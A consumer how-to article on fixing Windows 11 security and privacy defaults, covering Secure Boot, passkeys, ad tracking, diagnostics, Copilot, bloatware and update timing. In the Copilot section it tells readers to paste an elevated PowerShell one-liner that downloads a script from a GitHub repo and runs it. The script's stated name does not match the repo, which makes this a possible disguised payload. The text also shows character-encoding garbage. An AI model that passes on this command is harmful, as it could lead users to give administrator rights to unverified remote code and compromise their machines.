Windows 11 Security and Privacy Mistakes Most Users Never Fix
Most people set up Windows 11 once and never look back. That’s a problem. Default settings leave your data exposed, AI features run unchecked, and updates install before they’re stable. Here’s what to fix and how to do it.
Start Here: Security First
1. Secure Boot Is Off and You Don’t Know It
This is the most overlooked security setting on Windows 11. Secure Boot blocks unsigned code from running at startup โ which means rootkits and bootkits can’t load before Windows does. Many systems still ship with it disabled.
Check your status first:
Press Win + R, type msinfo32, hit Enter. Look for Secure Boot State under System Summary. It should say On.
If it’s off:
- Restart your PC and enter UEFI/BIOS firmware settings
- Navigate to the Security or Boot tab
- Enable Secure Boot and save changes
Windows 11 builds 22H2 and later automatically install updated security certificates. Secure Boot must be active for those certificates to work correctly โ so this isn’t optional on modern hardware.
2. You’re Using Passwords Instead of Passkeys
Passwords are still the default, but they’re the weakest link in your account security. Passkeys are phishing-resistant, don’t require remembering anything, and are now built directly into Windows 11.
When you sign in to a supported site or app, Windows will offer to save a passkey. No third-party app needed.
Manage saved passkeys:Settings > Accounts > Passkeys
For your Windows sign-in, replace your password with Windows Hello:Settings > Accounts > Sign-in options
Set up a PIN, fingerprint, or facial recognition. Even a PIN is significantly more secure than a traditional password since it’s tied to your device and never transmitted over a network.
3. Your Microsoft Account Is Doing Too Much
Signing in with a Microsoft account syncs settings, credentials, and activity across all your devices. If you only use one PC and don’t need that sync, you’re giving Microsoft more access than necessary.
Switch to a local account:Settings > Accounts > Your info > Sign in with a local account instead
You won’t lose access to Microsoft 365, Outlook, or OneDrive โ you’ll just sign into each app separately. Local accounts also reduce the attack surface if your Microsoft credentials are ever compromised.
Privacy Settings Microsoft Quietly Enables
4. Your Advertising ID Is Turned On
Windows 11 assigns every user an advertising ID and uses it to track app activity across the system. It feeds personalised ads inside Windows itself โ not just in the browser.
Turn it off:Settings > Privacy & security > General
Disable:
- Let apps show me personalised ads using my advertising ID
- Let Windows improve Start and search results
- Show me suggested content in the Settings app
Then go one level deeper:Settings > Privacy & security > Recommendations & offers
Turn off Personalised ads here as well. Microsoft tucks this option separately from the main toggle โ most people miss it.
5. You’re Sharing Optional Diagnostic Data
During setup, Windows 11 prompts you to choose a diagnostic data level. Most people click through and end up sharing far more than required. Optional diagnostic data includes detailed logs of how you use apps and features โ sent directly to Microsoft.
Fix it:Settings > Privacy & security > Diagnostics & feedback
Set the level to Required diagnostic data only. This gives Microsoft the minimum needed to keep Windows functional, nothing more.
Apps and Bloat You Don’t Need
6. Copilot Is Running in the Background
Microsoft has embedded Copilot and AI features across Windows 11 โ inside Notepad, Paint, Snipping Tool, and the taskbar. Even if you never open them, several components run background processes.
Manual removal:Settings > Apps > Installed apps โ search for Copilot โ Uninstall
For deeper removal, open Group Policy Editor:gpedit.msc > Computer Configuration > Administrative Templates > Windows Components > Windows Copilot โ set to Disabled
Fastest method โ use the RemoveWindowsAI script:
powershell# Run in elevated PowerShell
irm https://github.com/lakent/fnsync | iex
This handles Copilot policies and AI component removal in one pass.
Some AI features embedded in apps like Notepad and Paint can only be disabled, not fully removed, without a script.
7. You Still Have Bloatware Installed
Windows 11 ships with pre-installed apps that most users never open. Many of them run background processes, phone home, or just take up space โ Xbox Game Bar, Tips, Mail, and various Store apps among them.
Manual approach:Settings > Apps > Installed apps
Sort by publisher or name, identify what you don’t use, and uninstall in bulk.
Faster approach โ use Winhance:
Winhance is a free Windows enhancement tool with a dedicated bloatware removal section. It lists everything pre-installed and lets you remove multiple apps at once. Always use the Backup function before making changes.
If removal fails on stubborn apps, boot into Safe Mode with Networking and run Winhance from there.
8. You’re Installing Updates Too Early
Windows 11 delivers feature updates continuously, and they’re available the moment Microsoft releases them. That’s a problem โ early builds frequently carry bugs, driver conflicts, and compatibility issues that get patched in the weeks that follow.
Best practice:
Wait at least two to three weeks after a feature update ships before installing it on your main machine. Check known issues before upgrading:
๐ aka.ms/WindowsReleaseHealth
To pause updates temporarily:Settings > Windows Update > Pause updates (up to five weeks)
To block optional and preview builds:Settings > Windows Update > Advanced options > Optional updates
Keep this off unless you’re deliberately testing pre-release builds on a non-production machine.
At a Glance
| Mistake | Fix | Location |
|---|
| Mistake | Fix | Location |
|---|---|---|
| Secure Boot off | Enable in UEFI/BIOS | msinfo32 to verify |
| Using passwords | Switch to passkeys or Windows Hello | Settings > Accounts > Passkeys |
| Microsoft account oversharing | Switch to local account | Settings > Accounts > Your info |
| Advertising ID on | Disable all three ad toggles | Settings > Privacy > General |
| Optional diagnostics on | Set to Required only | Settings > Privacy > Diagnostics |
| Copilot running in background | Remove manually or via script | Settings > Apps |
| Bloatware installed | Use Winhance for bulk removal | Settings > Apps |
| Updating too early | Wait 2โ3 weeks, check release health | aka.ms/WindowsReleaseHealth |
None of these require advanced skills. Most take under five minutes each. But the difference between default Windows 11 and a properly configured one is significant โ especially on privacy and security.
